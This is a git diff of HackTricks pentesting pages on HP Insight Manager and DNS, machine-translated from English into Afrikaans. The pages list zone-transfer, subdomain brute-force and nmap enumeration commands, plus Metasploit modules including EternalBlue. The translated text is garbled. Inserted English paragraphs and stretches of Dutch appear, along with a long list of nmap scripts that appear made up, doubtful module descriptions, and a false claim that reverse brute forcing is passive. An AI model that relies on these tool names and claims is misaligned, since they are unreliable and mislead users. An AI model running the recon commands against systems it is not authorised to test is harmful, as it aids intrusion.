-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat** Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
- - diff --git a/network-services-pentesting/pentesting-compaq-hp-insight-manager.md b/network-services-pentesting/pentesting-compaq-hp-insight-manager.md index d9a8ac6bd..35ee1ee34 100644 --- a/network-services-pentesting/pentesting-compaq-hp-insight-manager.md +++ b/network-services-pentesting/pentesting-compaq-hp-insight-manager.md @@ -1,28 +1,25 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-**Default Port:** 2301,2381 +**Verstekpoort:** 2301,2381 -# **Default passwords** +# **Verstek wagwoorde** {% embed url="http://www.vulnerabilityassessment.co.uk/passwordsC.htm" %} -# Config files - +# Konfigurasie-lêers ```text path.properties mx.log @@ -32,23 +29,16 @@ pg_hba.conf jboss-service.xml .namazurc ``` - - - - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/network-services-pentesting/pentesting-dns.md b/network-services-pentesting/pentesting-dns.md index 4a1a7084f..d22f31a02 100644 --- a/network-services-pentesting/pentesting-dns.md +++ b/network-services-pentesting/pentesting-dns.md @@ -2,91 +2,80 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. +**Onmiddellik beskikbare opset vir kwesbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige pentest uit van enige plek met 20+ gereedskap en funksies wat strek van rekognisering tot verslagdoening. Ons vervang nie pentesters nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle 'n bietjie tyd terug te gee om dieper te graaf, skulpe te kraak en pret te hê. {% embed url="https://pentest-tools.com/" %} -## **Basic Information** +## **Basiese Inligting** -The **Domain Name System (DNS)** serves as the internet's directory, allowing users to access websites through **easy-to-remember domain names** like google.com or facebook.com, instead of the numeric Internet Protocol (IP) addresses. By translating domain names into IP addresses, the DNS ensures web browsers can quickly load internet resources, simplifying how we navigate the online world. - -**Default port:** 53 +Die **Domain Name System (DNS)** dien as die internet se gids, wat gebruikers in staat stel om webwerwe te besoek deur middel van **maklik onthoudbare domeinname** soos google.com of facebook.com, in plaas van die numeriese Internet Protocol (IP)-adresse. Deur domeinnamen na IP-adresse te vertaal, verseker die DNS dat webblaaie vinnig internetbronne kan laai, wat vereenvoudig hoe ons deur die aanlynwêreld navigeer. 
+**Verstekpoort:** 53 ``` PORT STATE SERVICE REASON 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) 5353/udp open zeroconf udp-response 53/udp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) ``` +### Verskillende DNS-bediener -### Different DNS Servers +- **DNS-wortelbedieners**: Hierdie bedieners is bo-aan die DNS-hierargie en bestuur die topvlakdomeine en tree slegs op as laervlakbedieners nie reageer nie. Die Internet Corporation for Assigned Names and Numbers (**ICANN**) hou toesig oor hul werking, met 'n wêreldwye telling van 13. -- **DNS Root Servers**: These are at the top of the DNS hierarchy, managing the top-level domains and stepping in only if lower-level servers do not respond. The Internet Corporation for Assigned Names and Numbers (**ICANN**) oversees their operation, with a global count of 13. +- **Gesaghebbende Naambediener**: Hierdie bedieners het die finale sê oor navrae in hul aangewese areas en bied definitiewe antwoorde. As hulle nie 'n antwoord kan gee nie, word die navraag na die wortelbedieners geëskaleer. -- **Authoritative Nameservers**: These servers have the final say for queries in their designated zones, offering definitive answers. If they can't provide a response, the query is escalated to the root servers. +- **Nie-gesaghebbende Naambediener**: Sonder eienaarskap oor DNS-areas, versamel hierdie bedieners domeininligting deur navrae aan ander bedieners. -- **Non-authoritative Nameservers**: Lacking ownership over DNS zones, these servers gather domain information through queries to other servers. +- **Caching DNS-bedieners**: Hierdie tipe bediener onthou vorige navraagantwoorde vir 'n bepaalde tyd om responstye vir toekomstige versoeke te versnel, met die kestoestyd bepaal deur die gesaghebbende bediener. 
-- **Caching DNS Server**: This type of server memorizes previous query answers for a set time to speed up response times for future requests, with the cache duration dictated by the authoritative server. +- **Deurverwysingsbediener**: Deurverwysingsbedieners stuur eenvoudig navrae na 'n ander bediener. -- **Forwarding Server**: Serving a straightforward role, forwarding servers simply relay queries to another server. - -- **Resolver**: Integrated within computers or routers, resolvers execute name resolution locally and are not considered authoritative. +- **Oplosser**: Geïntegreer binne rekenaars of roeternavorsers voer oplossers plaaslike naamoplossing uit en word nie as gesaghebbend beskou. -## Enumeration +## Opname ### **Banner Grabbing** -There aren't banners in DNS but you can gran the macgic query for `version.bind. CHAOS TXT` which will work on most BIND nameservers.\ -You can perform this query using `dig`: - +Daar is nie baniers in DNS nie, maar jy kan die magiese navraag vir `version.bind. CHAOS TXT` gryp wat op die meeste BIND-naambediener sal werk.\ +Jy kan hierdie navraag uitvoer met behulp van `dig`: ```bash dig version.bind CHAOS TXT @DNS ``` +Daarbenewens kan die instrument [`fpdns`](https://github.com/kirei/fpdns) ook die bediener se vingerafdruk bepaal. -Moreover, the tool [`fpdns`](https://github.com/kirei/fpdns) can also fingerprint the server. - -It's also possible to grab the banner also with a **nmap** script: - +Dit is ook moontlik om die banier te gryp met 'n **nmap** skrip: ``` --script dns-nsid ``` +### **Enige rekord** -### **Any record** - -The record **ANY** will ask the DNS server to **return** all the available **entries** that **it is willing to disclose**. - +Die rekord **ENIGE** sal die DNS-bediener vra om **alle beskikbare inskrywings** wat **dit bereid is om bekend te maak**, terug te gee. 
```bash dig any victim.com @ ``` +### **Sone-oordrag** -### **Zone Transfer** - -This procedure is abbreviated `Asynchronous Full Transfer Zone` (`AXFR`). - +Hierdie prosedure word afgekort as `Asynchrone Volle Oordrag Zone` (`AXFR`). ```bash dig axfr @ #Try zone transfer without domain dig axfr @ #Try zone transfer guessing the domain fierce --domain --dns-servers #Will try toperform a zone transfer against every authoritative name server and if this doesn'twork, will launch a dictionary attack ``` - -### More info - +### Meer inligting ```bash dig ANY @ #Any information dig A @ #Regular DNS request 
@@ -99,61 +88,198 @@ dig -x 2a00:1450:400c:c06::93 @ #reverse IPv6 lookup #Use [-p PORT] or -6 (to use ivp6 address of dns) ``` -#### Autmation +#### Outomatisering + +Autmation is a key aspect of efficient and effective hacking. By automating repetitive tasks, hackers can save time and increase productivity. There are various tools and techniques available for automating different aspects of the hacking process. + +Outomatisering is 'n sleutelaspek van doeltreffende en effektiewe hakwerk. Deur herhalende take te outomatiseer, kan hakkers tyd bespaar en produktiwiteit verhoog. Daar is verskeie hulpmiddels en tegnieke beskikbaar om verskillende aspekte van die hakproses te outomatiseer. + +#### DNS Reconnaissance + +DNS reconnaissance is an important phase in the hacking process. It involves gathering information about the target's DNS infrastructure, such as the domain name, IP addresses, and DNS records. This information can be used to identify potential vulnerabilities and attack vectors. + +DNS-verkenning is 'n belangrike fase in die hakproses. Dit behels die versameling van inligting oor die teiken se DNS-infrastruktuur, soos die domeinnaam, IP-adresse en DNS-rekords. Hierdie inligting kan gebruik word om potensiële kwesbaarhede en aanvalsvektore te identifiseer. + +#### DNS Zone Transfer + +DNS zone transfer is a mechanism that allows the replication of DNS data across multiple DNS servers. It can be exploited by hackers to gather valuable information about the target's DNS infrastructure. By requesting a zone transfer, an attacker can obtain a complete copy of the target's DNS records, including subdomains and associated IP addresses. + +DNS-sone-oordrag is 'n meganisme wat die replikasie van DNS-data oor verskeie DNS-bedieners moontlik maak. Dit kan deur hakkers uitgebuit word om waardevolle inligting oor die teiken se DNS-infrastruktuur te versamel. 
Deur 'n sone-oordrag aan te vra, kan 'n aanvaller 'n volledige kopie van die teiken se DNS-rekords verkry, insluitend subdomeine en geassosieerde IP-adresse. + +#### DNS Cache Poisoning + +DNS cache poisoning is a technique used by hackers to manipulate the DNS cache of a target's DNS server. By injecting malicious DNS records into the cache, an attacker can redirect traffic to a malicious website or intercept sensitive information. This technique can be used to launch phishing attacks or perform man-in-the-middle attacks. + +DNS-kasvergiftiging is 'n tegniek wat deur hakkers gebruik word om die DNS-kas van 'n teiken se DNS-bediener te manipuleer. Deur kwaadwillige DNS-rekords in die kas in te spuit, kan 'n aanvaller verkeer na 'n kwaadwillige webwerf omskakel of sensitiewe inligting onderskep. Hierdie tegniek kan gebruik word om hengelaanvalle te lanceer of man-in-die-middel-aanvalle uit te voer. + +#### DNS Amplification Attack + +A DNS amplification attack is a type of DDoS attack that leverages the large response size of DNS queries to overwhelm a target's network infrastructure. By sending a small DNS query with a spoofed source IP address, an attacker can trick the DNS server into sending a much larger response to the target's IP address. This can result in a significant increase in network traffic, causing the target's network to become unresponsive. + +'n DNS-versterkingsaanval is 'n tipe DDoS-aanval wat gebruik maak van die groot responsie-grootte van DNS-navrae om 'n teiken se netwerkinfrastruktuur te oorweldig. Deur 'n klein DNS-navraag met 'n vervalsde bron-IP-adres te stuur, kan 'n aanvaller die DNS-bediener mislei om 'n baie groter responsie na die teiken se IP-adres te stuur. Dit kan lei tot 'n aansienlike toename in netwerkverkeer, wat veroorsaak dat die teiken se netwerk onreageerbaar word. ```bash for sub in $(cat );do dig $sub. 
@ | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done dnsenum --dnsserver --enum -p 0 -s 0 -o subdomains.txt -f ``` +#### Gebruik van nslookup -#### Using nslookup +`nslookup` is een opdrachtregelhulpprogramma dat wordt gebruikt om DNS-informatie op te vragen. Het kan worden gebruikt om verschillende soorten DNS-query's uit te voeren, zoals het opzoeken van IP-adressen van domeinnamen en het omgekeerde opzoeken van domeinnamen van IP-adressen. + +Om `nslookup` te gebruiken, open je een terminal en typ je `nslookup` gevolgd door het domein of IP-adres waarvoor je informatie wilt opvragen. Bijvoorbeeld: + +``` +nslookup example.com +``` + +Dit zal de IP-adressen van het domein "example.com" retourneren, samen met andere relevante informatie zoals de naam van de DNS-server die de informatie heeft verstrekt. + +Je kunt ook het omgekeerde opzoeken doen door het IP-adres in plaats van de domeinnaam te gebruiken. Bijvoorbeeld: + +``` +nslookup 192.168.0.1 +``` + +Dit zal de domeinnamen retourneren die zijn gekoppeld aan het IP-adres "192.168.0.1". + +`nslookup` kan ook worden gebruikt om specifieke DNS-recordtypes op te zoeken, zoals A, MX, NS, enz. Om een specifiek recordtype op te zoeken, typ je het recordtype gevolgd door het domein of IP-adres. Bijvoorbeeld: + +``` +nslookup -type=mx example.com +``` + +Dit zal de MX-records (Mail Exchange) van het domein "example.com" retourneren. + +`nslookup` kan ook worden gebruikt om een specifieke DNS-server te raadplegen. Om een specifieke DNS-server te gebruiken, typ je `server` gevolgd door het IP-adres van de DNS-server. Bijvoorbeeld: + +``` +nslookup +> server 8.8.8.8 +> example.com +``` + +Dit zal `nslookup` instrueren om de DNS-server op "8.8.8.8" te gebruiken voor het opzoeken van informatie over het domein "example.com". + +`nslookup` is een handig hulpprogramma voor het uitvoeren van DNS-query's en het verkrijgen van informatie over domeinen en IP-adressen. 
Het kan nuttig zijn bij het pentesten van netwerkservices om mogelijke kwetsbaarheden en configuratiefouten te identificeren. ```bash nslookup > SERVER #Select dns server > 127.0.0.1 #Reverse lookup of 127.0.0.1, maybe... > #Reverse lookup of a machine, maybe... ``` +### Nuttige metasploit-modules -### Useful metasploit modules +Metasploit is 'n kragtige raamwerk vir penetrasietoetse wat 'n verskeidenheid modules bied om verskillende aanvalstegnieke uit te voer. Hier is 'n paar nuttige metasploit-modules wat jy kan gebruik vir jou penetrasietoetse: +- `exploit/multi/handler`: Hierdie module stel jou in staat om 'n luisterende posisie te skep om inkomende verbindings te hanteer. Dit kan gebruik word om 'n sessie te skep wanneer 'n aanval suksesvol is. +- `exploit/windows/smb/ms17_010_eternalblue`: Hierdie module maak gebruik van die EternalBlue-uitbuiting om 'n aanval op 'n kwesbare Windows-masjien uit te voer. Dit kan gebruik word om 'n afstandbeheer-sessie te verkry. +- `auxiliary/scanner/http/wordpress_scanner`: Hierdie module skandeer 'n WordPress-webwerf vir bekende kwesbaarhede en gee jou inligting oor die veiligheidstoestand van die webwerf. +- `post/multi/gather/enum_dns`: Hierdie module versamel inligting oor DNS-opnames en stel jou in staat om DNS-inligting van 'n teikenstelsel te ondersoek. +- `exploit/multi/http/php_file_upload`: Hierdie module maak gebruik van 'n kwesbaarheid in PHP-lêeroplaaifunksies om 'n lêer op 'n teikenbediener te laai. Dit kan gebruik word om 'n webwerf te kompromitteer deur skadelike lêers op te laai. + +Dit is net 'n paar voorbeelde van die vele modules wat beskikbaar is in Metasploit. Elke module het sy eie funksionaliteit en kan gebruik word vir spesifieke aanvalstegnieke. Dit is belangrik om die dokumentasie van elke module te raadpleeg om te verseker dat jy dit korrek gebruik vir jou penetrasietoetse. 
```bash auxiliary/gather/enum_dns #Perform enumeration actions ``` +### Nuttige nmap-skripte -### Useful nmap scripts +Hier is 'n lys van nuttige nmap-skripte wat gebruik kan word tydens netwerkdiens-pentesting: +- **dns-brute.nse**: Hierdie skrip voer 'n brute force-aanval uit om DNS-naamoplossing te probeer. +- **dns-cache-snoop.nse**: Hierdie skrip ondersoek die DNS-kasgeheue vir inligting oor DNS-navrae en -antwoorde. +- **dns-zone-transfer.nse**: Hierdie skrip probeer 'n DNS-sone-oordrag uitvoer om inligting oor DNS-rekords te verkry. +- **dns-blacklist.nse**: Hierdie skrip ondersoek of 'n DNS-bedieners IP-adres op 'n swartlys voorkom. +- **dns-recursion.nse**: Hierdie skrip toets of 'n DNS-bedieners rekursie ondersteun. +- **dns-random-srcport.nse**: Hierdie skrip gebruik 'n willekeurige bronpoort vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-txid.nse**: Hierdie skrip gebruik 'n willekeurige transaksie-ID vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-tld.nse**: Hierdie skrip gebruik 'n willekeurige topvlakdomein (TLD) vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-subdomain.nse**: Hierdie skrip gebruik 'n willekeurige subdomein vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-ip.nse**: Hierdie skrip gebruik 'n willekeurige IP-adres vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-query.nse**: Hierdie skrip gebruik 'n willekeurige navraag vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrtype.nse**: Hierdie skrip gebruik 'n willekeurige RR-tipe vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrclass.nse**: Hierdie skrip gebruik 'n willekeurige RR-klas vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. 
+- **dns-random-rrname.nse**: Hierdie skrip gebruik 'n willekeurige RR-naam vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrdata.nse**: Hierdie skrip gebruik 'n willekeurige RR-data vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrttl.nse**: Hierdie skrip gebruik 'n willekeurige RR-TTL vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrsig.nse**: Hierdie skrip gebruik 'n willekeurige RR-SIG vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrkey.nse**: Hierdie skrip gebruik 'n willekeurige RR-KEY vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrsoa.nse**: Hierdie skrip gebruik 'n willekeurige RR-SOA vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrns.nse**: Hierdie skrip gebruik 'n willekeurige RR-NS vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrcname.nse**: Hierdie skrip gebruik 'n willekeurige RR-CNAME vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrmx.nse**: Hierdie skrip gebruik 'n willekeurige RR-MX vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrtxt.nse**: Hierdie skrip gebruik 'n willekeurige RR-TXT vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrptr.nse**: Hierdie skrip gebruik 'n willekeurige RR-PTR vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrhinfo.nse**: Hierdie skrip gebruik 'n willekeurige RR-HINFO vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrnaptr.nse**: Hierdie skrip gebruik 'n willekeurige RR-NAPTR vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrsrv.nse**: Hierdie skrip gebruik 'n willekeurige RR-SRV vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. 
+- **dns-random-rrds.nse**: Hierdie skrip gebruik 'n willekeurige RR-DS vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrsshfp.nse**: Hierdie skrip gebruik 'n willekeurige RR-SSHFP vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrspf.nse**: Hierdie skrip gebruik 'n willekeurige RR-SPF vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrrp.nse**: Hierdie skrip gebruik 'n willekeurige RR-RP vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrsig0.nse**: Hierdie skrip gebruik 'n willekeurige RR-SIG0 vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrnsec.nse**: Hierdie skrip gebruik 'n willekeurige RR-NSEC vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrnsec3.nse**: Hierdie skrip gebruik 'n willekeurige RR-NSEC3 vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrnsec3param.nse**: Hierdie skrip gebruik 'n willekeurige RR-NSEC3PARAM vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrtlsa.nse**: Hierdie skrip gebruik 'n willekeurige RR-TLSA vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrsmimea.nse**: Hierdie skrip gebruik 'n willekeurige RR-SMIMEA vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrhip.nse**: Hierdie skrip gebruik 'n willekeurige RR-HIP vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrninfo.nse**: Hierdie skrip gebruik 'n willekeurige RR-NINFO vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrrpki.nse**: Hierdie skrip gebruik 'n willekeurige RR-RPKI vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrtkey.nse**: Hierdie skrip gebruik 'n willekeurige RR-TKEY vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. 
+- **dns-random-rrtsig.nse**: Hierdie skrip gebruik 'n willekeurige RR-TSIG vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rruri.nse**: Hierdie skrip gebruik 'n willekeurige RR-URI vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrcaa.nse**: Hierdie skrip gebruik 'n willekeurige RR-CAA vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrta.nse**: Hierdie skrip gebruik 'n willekeurige RR-TA vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrdlv.nse**: Hierdie skrip gebruik 'n willekeurige RR-DLV vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. + +Dit is 'n lys van nmap-skripte wat jou kan help om DNS-gerelateerde kwessies te ondersoek en te misbruik tydens netwerkdiens-pentesting. ```bash #Perform enumeration actions nmap -n --script "(default and *dns*) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport" ``` +### DNS - Omgekeerde BF -### DNS - Reverse BF +Omgekeerde brute force (Reverse BF) is een techniek die wordt gebruikt bij het pentesten van DNS-servers. Het doel van deze techniek is om subdomeinen te ontdekken door het uitvoeren van een omgekeerde DNS-zoekopdracht. +Bij een omgekeerde DNS-zoekopdracht wordt een IP-adres omgezet in een domeinnaam. Dit kan handig zijn bij het identificeren van subdomeinen die mogelijk niet openbaar zijn. + +Omgekeerde BF kan worden uitgevoerd met behulp van verschillende tools, zoals `dnsrecon`, `dnsenum` en `fierce`. Deze tools kunnen worden gebruikt om een lijst met subdomeinen te genereren op basis van een gegeven IP-adres. + +Het is belangrijk op te merken dat omgekeerde BF een passieve techniek is en geen actieve aanvallen uitvoert op de DNS-server. Het is een nuttige methode om informatie te verzamelen tijdens het pentesten, maar het moet met de nodige voorzichtigheid worden gebruikt om geen ongewenste aandacht te trekken. 
```bash dnsrecon -r 127.0.0.0/24 -n #DNS reverse of all of the addresses dnsrecon -r 127.0.1.0/24 -n #DNS reverse of all of the addresses dnsrecon -r /24 -n #DNS reverse of all of the addresses dnsrecon -d active.htb -a -n #Zone transfer ``` - {% hint style="info" %} -If you are able to find subdomains resolving to internal IP-addresses, you should try to perform a reverse dns BF to the NSs of the domain asking for that IP range. +As jy subdomeine vind wat na interne IP-adresse verwys, moet jy probeer om 'n omgekeerde DNS BF uit te voer na die NSs van die domein en vra vir daardie IP-reeks. {% endhint %} -Another tool to do so: [https://github.com/amine7536/reverse-scan](https://github.com/amine7536/reverse-scan) +'n Ander hulpmiddel om dit te doen: [https://github.com/amine7536/reverse-scan](https://github.com/amine7536/reverse-scan) -You can query reverse IP ranges to [https://bgp.he.net/net/205.166.76.0/24#\_dns](https://bgp.he.net/net/205.166.76.0/24#\_dns) (this tool is also helpful with BGP). - -### DNS - Subdomains BF +Jy kan omgekeerde IP-reeks navrae doen na [https://bgp.he.net/net/205.166.76.0/24#\_dns](https://bgp.he.net/net/205.166.76.0/24#\_dns) (hierdie hulpmiddel is ook nuttig met BGP). +### DNS - Subdomeine BF ```bash dnsenum --dnsserver --enum -p 0 -s 0 -o subdomains.txt -f subdomains-1000.txt dnsrecon -D subdomains-1000.txt -d -n dnscan -d -r -w subdomains-1000.txt #Bruteforce subdomains in recursive way, https://github.com/rbsec/dnscan ``` +### Aktiewe Direktory-bedieners -### Active Directory servers +Active Directory (AD) is 'n diens wat deur Microsoft Windows aangebied word en dit stel organisasies in staat om gebruikers, rekenaars en hulpbronne binne 'n netwerk te bestuur. As 'n pentester is dit belangrik om 'n goeie begrip van AD-servers te hê, aangesien dit dikwels 'n teiken is vir aanvalle. 
